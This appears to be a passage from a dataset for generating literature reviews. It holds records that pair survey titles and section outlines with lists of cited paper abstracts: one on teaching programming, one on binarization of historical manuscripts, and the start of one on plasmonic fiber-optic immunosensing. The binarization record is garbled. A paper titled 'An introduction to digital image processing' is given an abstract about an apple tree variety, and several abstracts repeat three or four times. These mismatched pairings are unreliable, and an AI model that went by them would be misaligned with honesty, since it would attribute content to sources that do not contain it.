and to use an existing solution as a framework for solving related problems. Perhaps more importantly, understanding the behavior of one problem solution can simplify the analysis of other problem solutions based on the same pattern. --- paper_title: Analysis of Design: An exploration of Patterns and Pattern Languages for Pedagogy paper_content: ion also serves a second purpose, that of cohesion of ideas. Practice can be captured at any scale, but it is the combination of capture and abstraction that makes the presentation of the ideas coherent. Lakoff (Lakoff, 1987) presents an example of this coherent use of abstraction in regard to the Linnean taxonomy of botanical classification Genus, Species, Sub-Species, Variety. An oak tree (for example) can be categorised at any level. However, in folk-classification (as opposed to scientific) Lakoff (quoting studies by Brown and Berlin, p.35) notes that the most commonly used (and by extension, the most significant) name and reference is at the level of abstraction that corresponds to the genus level (“oak”) rather than the life-form (“tree”) or variety (“white oak”) levels. Whilst an interesting observation in it’s own right, the more interesting point is that Linneaus actively used folk criteria for the genus level of abstraction which characterise the most readily apprehended (and used) criteria in “the real world”. This is a concept equally important in OO, Booch’s (Booch, 1994) codification of “key abstractions”, notes that there are levels of categorisation which are more significant in the problem space, and useful to the solution design, than others. He, too, suggests that these might most effectively be identified from actual usage “if the domain expert talks about it, then the abstraction is usually important”. What has been noticed here is that some categories of abstraction are more basic, more meaningful to human beings in their relationship with the world than others; that is the level of abstraction that good patterns seek to embrace. 4.3 Organising Principle As we have seen, patterns do not exist by themselves, but within a framework: a catalogue or language. In a catalogue, the power of the collection resides in the material collected. The index, or finding aid or other system of organisation is of secondary importance, it is simply a mechanism to get to the information. In a dictionary, encyclopaedia or thesaurus, the power resides as much in the arrangement of material, in the power that the organising principle confers to it, as in the individual entries themselves. The solitary definition of a word is useful, but much more potent in the context of a dictionary. The Organising Principle of a Pattern Language has a similar gestalt power; the language captures not only the pieces of design, but the shape of the whole into which the pieces fit. The Alexandrian organising principle is scale. A Pattern Language recognises the impossibility of providing a complete solution (“Here’s the plan for the house/street/city you want to build”) so presents many small, transferable solutions arranged in categories of scale, from “city-relevant” to “house-relevant”. Consequently, if I am building a house, not a whole street, I have an obvious entry point to the most appropriate level of patterns. The boundaries for these categories, however, are not hard and Alexander provides pointers, both up and down, through the levels pointing to larger-scale patterns to which a given pattern is contributory and to smaller-scale patterns on which it rests. The GoF framework is much simpler, residing on the applicability of their solutions to different functionality in the design process (Creational, Structural or Behavioural). Reference for this paper: Journal of Computers in Mathematics and Science Teaching: Special Issue CS-ED Research, 18(3):331-348, December 1999. The PPTOT collection has neither order, nor organising principle: instead, four separate “indexes” are provided, each on a different axis: A Learning Objectives Index, a Teaching/Learning Element Index, an Alphabetical Index and an Author Index. It is clear that these indexes have been super-imposed on the collection at a later date, and that they have had no impact at the time of creation. (However, it should be noted that PPOT is a work in progress, and recent work has turned towards structure and taxonomy. Although full details are not available, it would seem that this, too, is based on scale from “a technique pattern aimed at explaining a particular OO concept” to “a complex structure pattern built from smaller fundamental units, such as lectures and exercises” (McLaughlin et al, 1998)). A potentially interesting approach, which has not so far been adopted within the genre is one espoused by Jacobson (one of the original contributors to A Pattern Language) in a later work (Jacobson, Silverstein, Winslow, 1990). In this work the organising principle for good design is the balance achieved on various axes of contrast. Six axes are identified with respect to architecture with “good” design representing an equilibrium along and between these scales. A similar methodological approach (Wildermeersch, 1997) has been taken in an attempt to capture (and improve) the practice and experience of working within project-oriented groups; a domain with more obviously pedagogic potential. 4.4 Value System Design is a purposeful, value-laden activity. Good design encompasses values which are of importance to all the communities (or audience) for which the artefacts are intended. For the purposes of patterns, we can define three audiences: users, other designers and “society”. • Users: Values which are important to users are those embodied in the artefact itself. This is exemplified in the arts-andcrafts motto “Have nothing in your house which you do not know to be useful or believe to be beautiful”. If an object is difficult to use, or ugly, then it fails in its purpose. It is disfunctional. • Other Designers: Whilst fellow professionals might be expected to appreciate the values of the user community, they also hold another set of separate importance. These professional values encompass design notions of “elegance” and “simplicity”. An appreciation of the economy of immaterial processes (such as maintainability, factory production or services) also count here. • Society: Design also addresses ideas of value which are societally constructed. This is a more difficult (and difficult to observe) constituent of patterns and pattern languages. This is because this level is not directly addressed by patterns, although they are created against its backdrop. For example, the Alexandrian pattern 178, describing Composting Toilets, (Alexander et al, 1977) encompasses a far more wide-ranging set of values than a thing designed to do a job efficiently—that is usefully—and/or beautifully. (These values are not necessarily commonly held – but they would have to be, if everyone was to own one. They are of the societal level). Patterns are described and presented as internally consistent system of elements that are good in themselves and in relationship to each other. Any further set of values is extrinsic to this ordering, and therefore not described within a pattern collection. This notion of extrinsic validity is analogous to IQ tests which are internally consistent, valid and predictive (as are measurements of height). Their value, however, is neither measured nor contained within the application of the test but is determined by a separate, external system. A society which values high IQ (or tall people) gives a separate – and extrinsic – meaning to the results. The fact that (to continue the example) A Pattern Language doesn’t explicitly incorporate these values doesn’t mean that the patterns weren’t created with reference to them. It may be that there is no need for these values to be expressed in this way. Just as Fine Art reflects the values of the society in which it is created, so may design: “The best paintings often express their culture not just directly but complementarily, because it is by complementing it that they are best designed to serve public needs: the public does not need what it has already got.” (Baxandall, 1972). Alexandrian patterns have three audiences: architects (other designers) and the inhabitants of the buildings (users) are explicitly addressed, society is implicitly addressed. PPTOT patterns have two audiences, teachers (other designers) and the recipients of teaching (users). GoF patterns have but one audience – other designers – and reflect a single system of purely professional values. Christopher Alexander (whilst acknowledging his lack of expertise in the domain of software) has expressed his opinion that software patterns (and, I think by extension patterns based on that system) are not patterns in his sense but “a neat way to capture a bunch of interesting ideas” (Alexander, 1996). He does not explain why he thinks this is the case. It may be the constraint of their single value system. --- paper_title: Transfer in cognition paper_content: The purpose of this paper is to review the cognitive literature regarding transfer in order to provide a context for the consideration of transfer in neural networks. We consider transfer under the three general headings of analogy, skill transfer and metaphor. The emphasis of the research in each of these areas is quite different and the literatures are largely distinct. Important common themes emerge, however, relating to the role of similarity, the importance of “surface content”, and the nature of the representations that are used. We will draw out these common themes, and note ways of facilitating transfer. We also briefly note possible implications for the study of transfer in neural networks. --- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, little of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications. Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: On the Cruelty of Really Teaching Computer Science redux paper_content: Is our discipline of computer science in a time of crisis? Our field has helped unlock the human genome, has allowed a hand-held device to be a gateway to the world's information, and has transformed communication and society. Yet students do not want to study computer science. Do enrollment trends portend serious problems requiring immediate solutions or is the crisis greatly exaggerated? --- paper_title: Programming patterns and design patterns in the introductory computer science course paper_content: We look at the essential thinking skills students need to learn in the introductory computer science course based on object-oriented programming. We create a framework for such a course based on the elementary programming and design patterns. Some of these patterns are known in the pattern community, others enrich the collection. Our goal is to help students focus on mastering reasoning and design skills before the language idiosynchracies muddy the water. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: Problem-Based Learning for Foundation Computer Science Courses paper_content: The foundation courses in computer science pose particular challenges for teacher and learner alike. This paper describes some of these challenges and how we have designed problem-based learning (PBL) courses to address them. We discuss the particular problems we were keen to overcome: the purely technical focus of many courses; the problems of individual learning and the need to establish foundations in a range of areas which are important for computer science graduates. We then outline our course design, showing how we have created problem-based learning courses. The paper reports our evaluation of the approach. This has two parts: assessment of a trial, with a three-year longitudinal follow-up of the students; reports of student learning improve-ment after we had become experienced in full implementation of PBL. We conclude with a summary of our experience over three years of PBL teaching and discuss some of the pragmatic issues around introducing the radical change in teaching, maintaining staff suppo... --- paper_title: Rules of the Mind paper_content: Contents: Production Systems and the ACT-R Theory. Knowledge Representation. Performance. Learning. N. Kushmerick, C. Lebiere, Navigation and Conflict Resolution. N. Kushmerick, C. Lebiere, The Tower of Hanoi and Goal Structures. F.G. Conrad, A.T. Corbett, The LISP Tutor and Skill Acquisition. F.S. Bellezza, C.F. Boyle, The Geometry Tutor and Skill Acquisition. M.K. Singley, The Identical Elements Theory of Transfer. F.G. Conrad, A.T. Corbett, J.M. Fincham, D. Hoffman, Q. Wu, Computer Programming and Transfer. A.T. Corbett, Tutoring of Cognitive Skill. Creating Production-Rule Models. Reflections on the Theory. --- paper_title: A Perspective View and Survey of Meta-Learning paper_content: Different researchers hold different views of what the term meta-learning exactly means. The first part of this paper provides our own perspective view in which the goal is to build self-adaptive learners (i.e. learning algorithms that improve their bias dynamically through experience by accumulating meta-knowledge). The second part provides a survey of meta-learning as reported by the machine-learning literature. We find that, despite different views and research lines, a question remains constant: how can we exploit knowledge about learning (i.e. meta-knowledge) to improve the performance of learning algorithms? Clearly the answer to this question is key to the advancement of the field and continues being the subject of intensive research. ---
Title: Learning and teaching programming: A review and discussion Section 1: INTRODUCTION Description 1: Introduce the importance of programming as a skill, the high demand for programmers, the difficulties encountered by novice programmers, and the scope and focus of the review. Section 2: Experts Versus Novices Description 2: Discuss the distinctions and development stages between novice and expert programmers, characteristics of expert programmers, and typical novice deficits. Section 3: Knowledge Versus Strategies Description 3: Explore the foundational knowledge required for programming and the different strategies used by programmers, including how these differ between novices and experts. Section 4: Procedural Versus Object-Oriented Description 4: Compare issues related to procedural and object-oriented programming paradigms and how they affect novice comprehension and learning. Section 5: NOVICE PROGRAMMERS Description 5: Focus on how novices learn to program, including task complexity, cognitive processes, and the mental models they need to develop. Section 6: Mental Models and Processes Description 6: Detail the various mental models that programmers must maintain, including models of the problem domain, the notional machine, and the program itself. Section 7: Novice Capabilities and Behaviour Description 7: Analyze the specific knowledge and skill deficits of novice programmers, their common misconceptions, and issues with planning and problem-solving. Section 8: Kinds of Novice Description 8: Discuss the diversity among novice programmers, including differences in background, motivation, success predictors, and characteristic behaviors such as "movers" and "stoppers." Section 9: Goals and Progress Description 9: Explore the goals of introductory programming courses, the concept of "deep learning," and the challenge of fostering significant progress among novices. Section 10: Course Design and Teaching Methods Description 10: Review conventional and innovative approaches to course design and teaching methods, with an emphasis on addressing key issues identified in the literature. Section 11: Alternative Methods and Curricula Description 11: Consider alternative curricula and teaching methodologies, such as schema-based instruction, problem-solving approaches, and mathematical foundations. Section 12: Summary and Implications Description 12: Summarize the review and highlight practical implications for teaching programming, including methodological suggestions and potential areas for further research. Section 13: A Programming Framework Description 13: Introduce a programming framework summarizing the relationships between key issues in programming education and its potential uses in course design and student support. Section 14: Comments and Future Work Description 14: Provide speculative observations and suggest topics for future research, including the distinction between effective and ineffective novices and the central role of strategies in learning to program.
A Review of Evaluation of Optimal Binarization Technique for Character Segmentation in Historical Manuscripts
5
--- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nonde- structive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: Selection of thresholding methods for nondestructive testing applications paper_content: In nondestructive testing (NDT) applications based on image analysis, image segmentation is the most important step in the extraction of defective regions of materials. An effective and very simple method of image segmentation, especially in NDT applications, is image thresholding. In an effort to present a quantitative evaluation of image thresholding methods NDT applications, 41 thresholding algorithms are compared. They are grouped in six categories based on the information they are exploiting, such as histogram shape, object attribute or clustering behavior, etc. Performance assessment is based on the weighted combination of four complementary objective metrics. Based on the results of such NDT images as defective thermal, ultrasonic, eddy current, etc., the thresholding algorithms that perform well over the majority of cases are established and a mixture thresholding scheme is proposed. --- paper_title: An introduction to digital image processing paper_content: A new and distinct spur type apple variety which originated as a limb mutation of the standard winter banana apple tree (non-patented) is provided. This new apple variety possesses a vigorous compact and only slightly spreading growth habit and can be distinguished from its parent and the Housden spur type winter banana apple variety (non-patented). More specifically, the new variety forms more fruiting spurs per unit length on two and three year old wood than the standard winter banana apple tree and less spurs per unit length than the Housden spur type winter banana apple tree. Additionally, the new variety has the ability to heavily bear fruit having a whitish-yellow skin color with a sometimes slight scarlet red blush upon maturity which is substantially identical to that of the standard winter banana apple tree and which has substantially less skin russeting than the Housden spur type winter banana apple tree. --- paper_title: Decompose algorithm for thresholding degraded historical document images paper_content: Numerous techniques have previously been proposed for single-stage thresholding of document images to separate the written or printed information from the background. Although these global or local thresholding techniques have proven effective on particular subclasses of documents, none is able to produce consistently good results on the wide range of document image qualities that exist in general or the image qualities encountered in degraded historical documents. A new thresholding structure called the decompose algorithm is proposed and compared against some existing single-stage algorithms. The decompose algorithm uses local feature vectors to analyse and find the best approach to threshold a local area. Instead of employing a single thresholding algorithm, automatic selection of an appropriate algorithm for specific types of subregions of the document is performed. The original image is recursively broken down into subregions using quad-tree decomposition until a suitable thresholding method can be applied to each subregion. The algorithm has been trained using 300 historical images obtained from the Library of Congress and evaluated on 300 ‘difficult’ document images, also extracted from the Library of Congress, in which considerable background noise or variation in contrast and illumination exists. Quantitative analysis of the results by measuring text recall, and qualitative assessment of processed document image quality is reported. The decompose algorithm is demonstrated to be effective at resolving the problem in varying quality historical images. --- paper_title: A comparison of binarization methods for historical archive documents paper_content: This paper compares several alternative binarization algorithms for historical archive documents, by evaluating their effect on end-to-end word recognition performance in a complete archive document recognition system utilising a commercial OCR engine. The algorithms evaluated are: global thresholding; Niblack's and Sauvola's algorithms; adaptive versions of Niblack's and Sauvola's algorithms; and Niblack's and Sauvola's algorithms applied to background removed images. We found that, for our archive documents, Niblack's algorithm can achieve better performance than Sauvola's (which has been claimed as an evolution of Niblack's algorithm), and that it also achieved better performance than the internal binarization provided as part of the commercial OCR engine. --- paper_title: Goal-Directed Evaluation of Binarization Methods paper_content: This paper presents a methodology for evaluation of low-level image analysis methods, using binarization (two-level thresholding) as an example. Binarization of scanned gray scale images is the first step in most document image analysis systems. Selection of an appropriate binarization method for an input image domain is a difficult problem. Typically, a human expert evaluates the binarized images according to his/her visual criteria. However, to conduct an objective evaluation, one needs to investigate how well the subsequent image analysis steps will perform on the binarized image. We call this approach goal-directed evaluation, and it can be used to evaluate other low-level image processing methods as well. Our evaluation of binarization methods is in the context of digit recognition, so we define the performance of the character recognition module as the objective measure. Eleven different locally adaptive binarization methods were evaluated, and Niblack's method gave the best performance. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscipts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University at Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques. The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. --- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nonde- structive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: An introduction to digital image processing paper_content: A new and distinct spur type apple variety which originated as a limb mutation of the standard winter banana apple tree (non-patented) is provided. This new apple variety possesses a vigorous compact and only slightly spreading growth habit and can be distinguished from its parent and the Housden spur type winter banana apple variety (non-patented). More specifically, the new variety forms more fruiting spurs per unit length on two and three year old wood than the standard winter banana apple tree and less spurs per unit length than the Housden spur type winter banana apple tree. Additionally, the new variety has the ability to heavily bear fruit having a whitish-yellow skin color with a sometimes slight scarlet red blush upon maturity which is substantially identical to that of the standard winter banana apple tree and which has substantially less skin russeting than the Housden spur type winter banana apple tree. --- paper_title: Minimum error thresholding paper_content: Abstract A computationally efficient solution to the problem of minimum error thresholding is derived under the assumption of object and pixel grey level values being normally distributed. The method is applicable in multithreshold selection. --- paper_title: A new method for gray-level picture thresholding using the entropy of the histogram paper_content: Two methods of entropic thresholding proposed by Pun (Signal Process.,2, 1980, 223–237;Comput. Graphics Image Process.16, 1981, 210–239) have been carefully and critically examined. A new method with a sound theoretical foundation is proposed. Examples are given on a number of real and artifically generated histograms. --- paper_title: Histogram concavity analysis as an aid in threshold selection paper_content: A well-known heuristic for segmenting an image into gray level subpopulations is to select thresholds at the bottoms of valleys on the image's histogram. When the subpopulations overlap, valleys may not exist, but it is often still possible to define good thresholds at the `shoulders' of histogram peaks. Both valleys and shoulders correspond to concavities on the histogram, and this suggests that it should be possible to find good candidate thresholds by analyzing the histogram's concavity structure. Histogram concavity analysis as an approach to threshold selection is investigated and its performance on a set of histograms of infrared images of tanks is illustrated. --- paper_title: Goal-Directed Evaluation of Binarization Methods paper_content: This paper presents a methodology for evaluation of low-level image analysis methods, using binarization (two-level thresholding) as an example. Binarization of scanned gray scale images is the first step in most document image analysis systems. Selection of an appropriate binarization method for an input image domain is a difficult problem. Typically, a human expert evaluates the binarized images according to his/her visual criteria. However, to conduct an objective evaluation, one needs to investigate how well the subsequent image analysis steps will perform on the binarized image. We call this approach goal-directed evaluation, and it can be used to evaluate other low-level image processing methods as well. Our evaluation of binarization methods is in the context of digit recognition, so we define the performance of the character recognition module as the objective measure. Eleven different locally adaptive binarization methods were evaluated, and Niblack's method gave the best performance. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscipts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University at Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques. The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. --- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nonde- structive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: A comparison of binarization methods for historical archive documents paper_content: This paper compares several alternative binarization algorithms for historical archive documents, by evaluating their effect on end-to-end word recognition performance in a complete archive document recognition system utilising a commercial OCR engine. The algorithms evaluated are: global thresholding; Niblack's and Sauvola's algorithms; adaptive versions of Niblack's and Sauvola's algorithms; and Niblack's and Sauvola's algorithms applied to background removed images. We found that, for our archive documents, Niblack's algorithm can achieve better performance than Sauvola's (which has been claimed as an evolution of Niblack's algorithm), and that it also achieved better performance than the internal binarization provided as part of the commercial OCR engine. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscipts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University at Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques. The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. --- paper_title: Survey over image thresholding techniques and quantitative performance evaluation paper_content: We conduct an exhaustive survey of image thresholding methods, categorize them, express their formulas under a uniform notation, and finally carry their performance comparison. The thresholding methods are categorized according to the information they are exploiting, such as histogram shape, measurement space clustering, entropy, object attributes, spatial correlation, and local gray-level surface. 40 selected thresholding methods from various categories are compared in the context of nondestructive testing applications as well as for document images. The comparison is based on the combined performance measures. We identify the thresholding algorithms that perform uniformly better over nonde- structive testing and document image applications. © 2004 SPIE and IS&T. (DOI: 10.1117/1.1631316) --- paper_title: Selection of thresholding methods for nondestructive testing applications paper_content: In nondestructive testing (NDT) applications based on image analysis, image segmentation is the most important step in the extraction of defective regions of materials. An effective and very simple method of image segmentation, especially in NDT applications, is image thresholding. In an effort to present a quantitative evaluation of image thresholding methods NDT applications, 41 thresholding algorithms are compared. They are grouped in six categories based on the information they are exploiting, such as histogram shape, object attribute or clustering behavior, etc. Performance assessment is based on the weighted combination of four complementary objective metrics. Based on the results of such NDT images as defective thermal, ultrasonic, eddy current, etc., the thresholding algorithms that perform well over the majority of cases are established and a mixture thresholding scheme is proposed. --- paper_title: Optimal combination of document binarization techniques using a self-organizing map neural network paper_content: This paper proposes an integrated system for the binarization of normal and degraded printed documents for the purpose of visualization and recognition of text characters. In degraded documents, where considerable background noise or variation in contrast and illumination exists, there are many pixels that cannot be easily classified as foreground or background pixels. For this reason, it is necessary to perform document binarization by combining and taking into account the results of a set of binarization techniques, especially for document pixels that have high vagueness. The proposed binarization technique takes advantage of the benefits of a set of selected binarization algorithms by combining their results using a Kohonen self-organizing map neural network. Specifically, in the first stage the best parameter values for each independent binarization technique are estimated. In the second stage and in order to take advantage of the binarization information given by the independent techniques, the neural network is fed by the binarization results obtained by those techniques using their estimated best parameter values. This procedure is adaptive because the estimation of the best parameter values depends on the content of images. The proposed binarization technique is extensively tested with a variety of degraded document images. Several experimental and comparative results, exhibiting the performance of the proposed technique, are presented. --- paper_title: Minimum error thresholding paper_content: Abstract A computationally efficient solution to the problem of minimum error thresholding is derived under the assumption of object and pixel grey level values being normally distributed. The method is applicable in multithreshold selection. --- paper_title: An evaluation survey of binarization algorithms on historical documents paper_content: Document binarization is an active research area for many years. There are many difficulties associated with satisfactory binarization of document images and especially in cases of degraded historical documents. In this paper, we try to answer the question ldquohow well an existing binarization algorithm can binarize a degraded document image?rdquo We propose a new technique for the validation of document binarization algorithms. Our method is simple in its implementation and can be performed on any binarization algorithm since it doesnpsilat require anything more than the binarization stage. Then we apply the proposed technique to 30 existing binarization algorithms. Experimental results and conclusions are presented. --- paper_title: Histogram concavity analysis as an aid in threshold selection paper_content: A well-known heuristic for segmenting an image into gray level subpopulations is to select thresholds at the bottoms of valleys on the image's histogram. When the subpopulations overlap, valleys may not exist, but it is often still possible to define good thresholds at the `shoulders' of histogram peaks. Both valleys and shoulders correspond to concavities on the histogram, and this suggests that it should be possible to find good candidate thresholds by analyzing the histogram's concavity structure. Histogram concavity analysis as an approach to threshold selection is investigated and its performance on a set of histograms of infrared images of tanks is illustrated. --- paper_title: A Method for Objective Edge Detection Evaluation and Detector Parameter Selection paper_content: Subjective evaluation by human observers is usually used to analyze and select an edge detector parametric setup when real-world images are considered. We propose a statistical objective performance analysis and detector parameter selection, using detection results produced by different detector parameters. Using the correspondence between the different detection results, an estimated best edge map, utilized as an estimated ground truth (EGT), is obtained. This is done using both a receiver operating characteristics (ROC) analysis and a Chi-square test, and considers the trade off between information and noisiness in the detection results. The best edge detector parameter set (PS) is then selected by the same statistical approach, using the EGT. Results are demonstrated for several edge detection techniques, and compared to published subjective evaluation results. The method developed here suggests a general tool to assist in practical implementations of parametric edge detectors where an automatic process is required. --- paper_title: An evaluation survey of binarization algorithms on historical documents paper_content: Document binarization is an active research area for many years. There are many difficulties associated with satisfactory binarization of document images and especially in cases of degraded historical documents. In this paper, we try to answer the question ldquohow well an existing binarization algorithm can binarize a degraded document image?rdquo We propose a new technique for the validation of document binarization algorithms. Our method is simple in its implementation and can be performed on any binarization algorithm since it doesnpsilat require anything more than the binarization stage. Then we apply the proposed technique to 30 existing binarization algorithms. Experimental results and conclusions are presented. --- paper_title: Comparing background elimination approaches for processing of ancient Thai manuscipts on palm leaves paper_content: The objective of the Preservation of Palm Leaf Manuscripts Project at Mahasarakham University at Thailand is to preserve and retrieve traditional knowledge from ancient manuscripts recorded on palm leaves. An essential task in the process is to recognize the ancient characters automatically through image processing techniques. The paper compares different background elimination approaches which could be used. The aim is to improve the global and local adaptive thresholding techniques intelligently, and to form the pre-processing procedure in the automated process. ---
Title: A Review of Evaluation of Optimal Binarization Technique for Character Segmentation in Historical Manuscripts Section 1: INTRODUCTION Description 1: This section should introduce the topic of the paper, provide context about the historical manuscripts in Thailand, and explain the importance and challenges of binarization for character segmentation in such documents. Section 2: BINARIZATION TECHNIQUES Description 2: This section should describe various binarization techniques, including global and local thresholding methods, and their applications in document image processing. Section 3: MEASUREMENTS OF IMAGE QUALITY Description 3: This section should explain different methods and criteria used to evaluate the quality of binarized images, such as misclassification error, edge mismatch, and shape distortion penalty. Section 4: A FRAMEWORK OF AN AUTOMATIC SELECTION OF OPTIMAL BINARIZATION ALGORITHM Description 4: This section should present a proposed framework for automatically selecting the best binarization algorithm for historical documents, incorporating steps like algorithm selection, image clustering, feature extraction, and machine learning classification. Section 5: CONCLUSION AND DISCUSSION Description 5: This section should summarize the findings of the survey, discuss the limitations of existing binarization techniques, and propose future research directions to improve the automatic selection of binarization algorithms for historical manuscripts.
Plasmonic Optical Fiber-Grating Immunosensing: A Review
17
--- paper_title: Fiber optic SPR biosensing of DNA hybridization and DNA-protein interactions. paper_content: In this paper we present a fiber optic surface plasmon resonance (SPR) sensor as a reusable, cost-effective and label free biosensor for measuring DNA hybridization and DNA-protein interactions. This is the first paper that combines the concept of a fiber-based SPR system with DNA aptamer bioreceptors. The fibers were sputtered with a 50nm gold layer which was then covered with a protein repulsive self-assembled monolayer of mixed polyethylene glycol (PEG). Streptavidin was attached to the PEG's carboxyl groups to serve as a versatile binding element for biotinylated ssDNA. The ssDNA coated SPR fibers were first evaluated as a nucleic acid biosensor through a DNA-DNA hybridization assay for a random 37-mer ssDNA. This single stranded DNA showed a 15 nucleotides overlap with the receptor ssDNA on the SPR fiber. A linear calibration curve was observed in 0.5-5 microM range. A negative control test did not reveal any significant non-specific binding, and the biosensor was easily regenerated. In a second assay the fiber optic SPR biosensor was functionalized with ssDNA aptamers against human immunoglobulin E. Limits of detection (2nM) and quantification (6nM) in the low nanomolar range were observed. The presented biosensor was not only useful for DNA and protein quantification purposes, but also to reveal the binding kinetics occurring at the sensor surface. The dissociation constant between aptamer and hIgE was equal to 30.9+/-2.9nM. The observed kinetics fully comply with most data from the literature and were also confirmed by own control measurements. --- paper_title: Fibre-optic evanescent field absorption sensor based on a U-shaped probe paper_content: A fibre-optic evanescent field absorption sensor based on a U-shaped sensing probe is described. The influences of fibre core diameter, bending radius of the probe and the refractive index of the fluid on the sensitivity of the sensor are evaluated experimentally. The results are compared with the theoretical results obtained using geometrical optics and based on two-dimensional treatment. A good qualitative agreement is found between them. --- paper_title: Surface Plasmon Resonance-Based Fiber Optic Sensors: Principle, Probe Designs, and Some Applications paper_content: Surface plasmon resonance technique in collaboration with optical fiber technology has brought tremendous advancements in sensing of various physical, chemical, and biochemical parameters. In this review article, we present the principle of SPR technique for sensing and various designs of the fiber optic SPR probe reported for the enhancement of the sensitivity of the sensor. In addition, we present few examples of the surface plasmon resonance- (SPR-) based fiber optic sensors. The present review may provide researchers valuable information regarding fiber optic SPR sensors and encourage them to take this area for further research and development. --- paper_title: Local Excitation, Scattering, and Interference of Surface Plasmons paper_content: The optical probe of a scanning near-field optical microscope is shown to act as a point source of surface plasmon (SP) polaritons on gold and silver films. Plasmon excitation manifests itself by emission of light in the direction of the SP resonance angle, originating from an area with the shape of a dipole radiation pattern whose extension is given by the SP decay length. Interaction with selected, individual surface inhomogeneities gives rise to characteristic modifications of the emitted radiation, which provide detailed information about SP scattering, reflection, and interference phenomena. --- paper_title: Bending effects in optical fibers paper_content: Mode coupling at bends in optical fibers supporting one or only a few guided modes is analyzed by considering the local normal modes for the corresponding straight waveguide. Matrix elements giving the strength of coupling between guided modes at a corner bend, and for coupling between guided modes and radiation modes, are calculated as a function of guiding strength for this "geometrical" effect. The correction to these matrix elements due to the longitudinal strain in a bent fiber is also determined. The increase in propagation constant for the fundamental mode of a fiber wrapped in a coil of constant radius is calculated from information on the coupling strengths and mode propagation constants. The phase shift and attenuation of the fundamental mode caused by a spatially periodic microbending of the fiber axis are also considered. Finally, potential applications of these effects in fiber-optic devices such as mode converters, phase shifters, switches, and sensors are discussed. --- paper_title: A fiber-optic chemical sensor based on surface plasmon resonance paper_content: Abstract A fiber-optic chemical sensor is presented which utilizes surface plasmon resonance excitation. The sensing element of the fiber has been fabricated by removing a section of the fiber cladding and symmetrically depositing a thin layer of highly reflecting metal onto the fiber core. A white-light source is used to introduce a range of wavelengths into the fiber optic. Changes in the sensed parameters (e.g., bulk refractive index, film thinkness and film refractive index) are determined by measuring the transmitted spectral-intensity distribution. Experimental results of the sensitivity and the dynamic range in the measurement of the refractive indices of aqueous solutions are in agreement with the theoretical model of the sensor. --- paper_title: Surface plasmon subwavelength optics paper_content: Surface plasmons are waves that propagate along the surface of a conductor. By altering the structure of a metal's surface, the properties of surface plasmons—in particular their interaction with light—can be tailored, which offers the potential for developing new types of photonic device. This could lead to miniaturized photonic circuits with length scales that are much smaller than those currently achieved. Surface plasmons are being explored for their potential in subwavelength optics, data storage, light generation, microscopy and bio-photonics. --- paper_title: Fiber-Optic Sensors Based on Surface Plasmon Resonance: A Comprehensive Review paper_content: Since the introduction of optical fiber technology in the field of sensor based on the technique of surface plasmon 